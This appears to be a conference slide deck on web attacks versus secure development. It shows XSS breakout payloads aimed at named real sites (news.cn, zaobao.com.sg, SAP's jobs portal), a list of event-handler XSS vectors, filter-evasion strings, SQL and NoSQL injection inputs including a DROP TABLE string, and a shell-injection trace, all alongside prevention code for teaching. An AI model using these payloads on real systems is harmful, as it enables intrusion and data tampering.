Soumyasanto Sen, #sitWDF
Hackers versus Developers
The GAME is ON
Introduction

Player 1: Hackers
Expert: Skillful, with a detailed understanding of some area, often scarily deep.
Unsocial: Don't want to come out of the shell.
Breaker: Hack apps
Cool: People think that they are cool, and they think they are awesome.
Super Power: They believe that they can be "Masters of the Universe"

VS

Player 2: Developers
Controller: Can use lots of systems and languages and get them talking to each other.
Social: True and broad professionals; work with people and communicate well
Builder: Create apps
Boring: There are other, more important things in life than just coding.
Super Power: They believe they can change this world.
Hacking looks ‘Simple’: XSS - Cross Site Scripting

JavaScript's built-in function(s)
decodeURI: decodes an encoded URI

http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic="xxxxxxxx'yyyyy</img

Possibilities:
• '-confirm(1)-'
• '-confirm`1`-'

http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic='-confirm(1)-'

Reflected into the page's inline script, the parameter lands inside a JavaScript string literal:
var topic = decodeURI('');confirm(1);('');
var topic = decodeURI('');confirm(1);//');
Hacking looks ‘Simple’: XSS - Cross Site Scripting

JavaScript's built-in function(s)
replace (JS String replace method): returns a new string in which a matched pattern has been replaced

http://www.zaobao.com.sg/search/site/"xxxxxxxx'yyyyy</img

Possibilities:
http://www.zaobao.com.sg/search/site/"-confirm(1)-"
http://www.zaobao.com.sg/search/site/");confirm(1);("
http://www.zaobao.com.sg/search/site/");confirm(1);// (does not work because // is filtered)
Easy Rules: Preventions
• XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP
• HTML5 Security Cheat Sheet
• Secure Coding Practice Guidelines
• Use clean URLs: https://www.site.com/news.php?id=1337 is way more tempting than https://www.site.com/news/some-news-or-today
• Sanitize inputs: a must for XSS
• Control access: http://www.site.com/phpmyadmin gave us access to the complete database! No injection, nothing
• Validate input.
• Use white-listing
• Switch off error display.
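The decodeURI and replace cases above both reflect a URL parameter into a JavaScript string literal inside an inline script, which is where "Sanitize inputs" has to mean context-aware output encoding. The following is an added example, not code from the slides or from the sites named on them; it assumes a Node.js server that renders the `var topic = decodeURI('...')` line itself and so controls how the value is encoded.

```javascript
// Added example, not from the slides: encoding for the JavaScript string context that the
// decodeURI/replace cases reflect into. Assumed: a Node.js server renders the inline script
// "var topic = decodeURI('...')" itself, so it can encode the value before concatenation.

// Build a JavaScript string literal that is safe to embed inside <script>:
// JSON.stringify escapes quotes and backslashes; the extra replacements keep "</script>"
// from closing the script block and U+2028/U+2029 from terminating a line in older parsers.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened renderer: the user-supplied topic can only ever be string data.
function renderTopicScript(topic) {
  return '<script>var topic = decodeURI(' + jsStringLiteral(topic) + ');</script>';
}

// The vulnerable pattern from the slides, for comparison: raw concatenation into the quotes.
function renderTopicScriptUnsafe(topic) {
  return "<script>var topic = decodeURI('" + topic + "');</script>";
}

// Constructed inputs: the probes shown on the slides.
const PROBES = ["'-confirm(1)-'", "');confirm(1);//", '</script><script>alert(1)</script>'];

for (const probe of PROBES) {
  console.log('unsafe: ' + renderTopicScriptUnsafe(probe));
  console.log('safe:   ' + renderTopicScript(probe));
}
```

The encoded literal is still valid JSON, so `JSON.parse(jsStringLiteral(x))` returns `x` unchanged; the browser sees exactly the user's text as data and nothing as code.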
Easy Rules: Remember
“Successful hackers are not just good at hacking. What makes a great hacker successful is that they are excellent at understanding human nature.”
( Developers love their code, just like it's their child. )
“Do not trust anything ever, especially when it comes to user input.”
“Security is about layers. It has to be, because no single layer can be guaranteed to actually be secure.”
Security is nothing but an ILLUSION.
Hacking looks ‘Simple’, even for SAP: Breaking SuccessFactors's XSS Filter

'-confirm(1)-' was enough to break SAP SuccessFactors's XSS filter and made hundreds of web applications vulnerable ...

https://jobs.sap.com/talentcommunity/login/?returnurl="xxxxxxxx'yyyyy</img

Possibilities:
• </script><script>alert(1)</script>
• '-confirm(1)-'

https://jobs.sap.com/talentcommunity/login/?returnurl=</script><script>alert(1)</script>

Next vectors:
• <img src=x onerror=alert(1)>
• <img src=x onerror=confirm(1)>
• <a href=javascript:confirm(1)>click</a>
• <p onmouseover=prompt(1)>IamParagraph</p>
• <details ontoggle=confirm(1)>
• <input type=search onsearch=confirm(1)>
Easy Filtering: Context Based Filtering
Protection against JavaScript execution via the URL context, e.g. an img's src and/or an anchor's href attribute: implementation of `urlContextCleaner()`.
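The slides name `urlContextCleaner()` but do not show its body. The following is an added example of one way to implement such a cleaner, written here and not taken from the slides or from any product mentioned on them. It assumes the application's own origin is `https://app.example` (a placeholder) and that only http(s) links belong in src/href attributes; everything else, including the case, whitespace and nesting tricks shown later for javascript: URIs, gets a safe default.

```javascript
// Added example, not from the slides: one possible implementation of the urlContextCleaner()
// the slides name. Assumed: APP_ORIGIN is the application's own origin (placeholder value)
// and only http(s) URLs are acceptable in src/href attributes.
const APP_ORIGIN = 'https://app.example';          // assumed base for relative links
const SAFE_SCHEMES = new Set(['http:', 'https:']); // allowlist, not a javascript: blacklist
const FALLBACK = 'about:blank';                    // what an unacceptable URL turns into

// Parse with the WHATWG URL parser, which lower-cases the scheme, trims surrounding whitespace
// and drops embedded tabs/newlines, then accept only schemes on the allowlist. A value with no
// usable scheme (e.g. "javascriptJ a V a S c R iPt::alert(1)") resolves as a relative path
// under APP_ORIGIN, which is also how a browser would treat it.
function urlContextCleaner(raw) {
  let parsed;
  try {
    parsed = new URL(String(raw), APP_ORIGIN);
  } catch (e) {
    return FALLBACK;                                // unparseable input gets the safe default
  }
  return SAFE_SCHEMES.has(parsed.protocol) ? parsed.href : FALLBACK;
}

// Attribute-level helper: the cleaned value for a URL-bearing attribute, or an error for
// any other attribute so the function cannot be misused for non-URL contexts.
function cleanUrlAttribute(name, value) {
  if (name !== 'href' && name !== 'src') throw new Error('not a URL attribute: ' + name);
  return urlContextCleaner(value);
}

// Constructed inputs covering the evasions the slides mention (case, whitespace, nesting).
const SAMPLES = [
  'https://example.org/page',
  '/news/some-news-or-today',
  'javascript:confirm(1)',
  '  JaVaScRiPt:alert(1)',
  'java\tscript:alert(1)',
  'javascriptJ a V a S c R iPt::alert(1)',
  'data:text/html,<script>alert(1)</script>',
];
for (const sample of SAMPLES) {
  console.log(JSON.stringify(sample) + ' -> ' + urlContextCleaner(sample));
}
```

The design choice is to let the same parser the browser uses decide what the scheme is, instead of pattern-matching the string for "javascript"; a blacklist that strips one occurrence of the word is exactly what the nested `javascriptJ a V a S c R iPt:` vector defeats.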
Easy Filtering: External HTML Sanitizer
https://developers.google.com/caja/
The Caja project includes an HTML sanitizer.
Example:
<script src="html-sanitizer-minified.js"></script>
<script>
// URL policy: only http(s) URLs survive; anything else (javascript:, data:, ...) is dropped
function urlX(url) { if (/^https?:\/\//.test(url)) { return url } }
// id/name policy: pass identifiers through unchanged
function idX(id) { return id }
// the closing tag inside the string is written as <\/script> so the HTML parser does not end the block early
alert(html_sanitize('<b>hello</b><img src="http://asdf"><a href="javascript:alert(0)"><script src="http://dfd"><\/script>', urlX, idX))
</script>
Hacking in Node.js
Node.js is a JavaScript runtime built on Chrome's V8 JavaScript engine.

Of course, XSS
Improper parsing of nested tags and incomplete filtering of javascript: URIs:
<s <onmouseover="alert(1)"> <s onmouseover="alert(1)">This is a test</s>
<a href="javascriptJ a V a S c R iPt::alert(1)" "<s>">test</a>
(with any encoding)
Hacking in Node.js: Server Side JavaScript Injection
Simple JS command:
response.end("Ended Response");
Shell invocation recorded by strace when user input reaches a command string:
[pid 25170] execve("/bin/sh", ["/bin/sh", "-c", "ls -l user input"],
Hacking in Node.js: SQL and NoSQL Injection
Classic SQL injection bypass:
SELECT * FROM users WHERE username = '$username' AND password = '$password'
(SELECT * FROM users WHERE username = '' or 1=1--' AND password = '')
select author from books where id=$id -> (select author from books where id=2 or 1=1)
// string concatenation: the user value becomes part of the SQL text
Statement stmt = conn.createStatement();
stmt.execute("INSERT INTO students VALUES('" + user + "')");
(Robert'); DROP TABLE students; --)
db.users.find({username: username, password: password}); (NoSQL)
{ "username": {"$gt": ""},
  "password": {"$gt": ""} }
Secure Node.js: Protection
XSS Prevention
• Sanitize untrusted HTML
  http://jsxss.com/en/index.html
  https://github.com/theSmaw/Caja-HTML-Sanitizer
  https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project
SSJSI Prevention
• Substitute eval() with JSON.parse(); the code is no longer injectable
• Use child_process.execFile or child_process.spawn instead of child_process.exec
Secure Node.js: Protection
SQL and NoSQL Injection Prevention
• Use parameterized SQL
  var q = 'SELECT name FROM books WHERE id = $1'; client.query(q, ['3'], function(err, result) {});
• PreparedStatements avoid/prevent SQL injection
  PreparedStatement stmt = conn.prepareStatement("INSERT INTO student VALUES(?)");
  stmt.setString(1, user);
  stmt.execute();
• Use the $in operator to match values (NoSQL)
  db.users.find({user: { $in: [user] }, pass: { $in: [pass] }});
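For the NoSQL case, the `{"$gt": ""}` payload from the earlier slide works only because the client-supplied JSON object is placed into the filter unchanged. The following added example, written here and not taken from the slides, shows the vulnerable filter next to a hardened one that strips `$`-prefixed keys and insists that both credentials are plain strings before applying the `$in` wrapping the slide recommends. It assumes the body has already been parsed from JSON (for example by `express.json()`) and that users are looked up with `db.users.find()`.

```javascript
// Added example, not from the slides: hardening the login filter against the
// {"$gt": ""} operator-injection payload. Assumed: the body arrives already parsed
// from JSON (e.g. by express.json()), and users are looked up with db.users.find().

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Defence in depth: recursively drop keys beginning with '$' so no query operator can
// reach the driver through any object the client controls.
function stripOperators(value) {
  if (Array.isArray(value)) return value.map(stripOperators);
  if (isPlainObject(value)) {
    const out = {};
    for (const [key, val] of Object.entries(value)) {
      if (!key.startsWith('$')) out[key] = stripOperators(val);
    }
    return out;
  }
  return value;
}

// Vulnerable pattern from the slides: whatever JSON the client sent becomes the filter,
// so {"username": {"$gt": ""}} turns into a comparison that matches every document.
function loginFilterUnsafe(body) {
  return { username: body.username, password: body.password };
}

// Hardened: credentials must be plain strings, so an object can never become an operator.
// The $in wrapping from the slides is applied on top of the type check.
function loginFilterSafe(body) {
  const { username, password } = stripOperators(body);
  if (typeof username !== 'string' || typeof password !== 'string') {
    throw new TypeError('username and password must be strings');
  }
  return { username: { $in: [username] }, password: { $in: [password] } };
}

// Constructed request bodies: the slides' payload and an ordinary login.
const INJECTED = { username: { $gt: '' }, password: { $gt: '' } };
const NORMAL = { username: 'alice', password: 's3cret' };

console.log('unsafe filter:', JSON.stringify(loginFilterUnsafe(INJECTED)));
try {
  loginFilterSafe(INJECTED);
} catch (e) {
  console.log('rejected: ' + e.message);
}
console.log('safe filter:', JSON.stringify(loginFilterSafe(NORMAL)));
```

The type check is the part that matters; stripping `$` keys is a second layer for filters built from larger, nested request objects where a single `typeof` test does not reach every field.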
Good Cause
Positive Side
• Social good: find solutions for social benefit, operations and emergencies
• Penetration testing: to find vulnerabilities that an attacker could exploit
• Open source: much of this open-source code is produced, tested and improved by hackers, usually at hackathons

Negative Side: Top 10 fears of 2015 (Source: Chapman University)
• Corruption of government officials (58.0%)
• Cyber-terrorism (44.8%)
• Corporate tracking of personal information (44.6%)
• Terrorist attacks (44.4%)
• Government tracking of personal information (41.4%)
• Bio-warfare (40.9%)
• Identity theft (39.6%)
• Economic collapse (39.2%)
• Running out of money in the future (37.4%)
• Credit card fraud (36.9%)
Make a Difference (Source: Scott Hanselman)

Who is the Winner?
A "Hacker" is a state of mind.
A "Developer" is a state of function.
Choice is Yours
Thank You
Soumyasanto Sen
@soumyasanto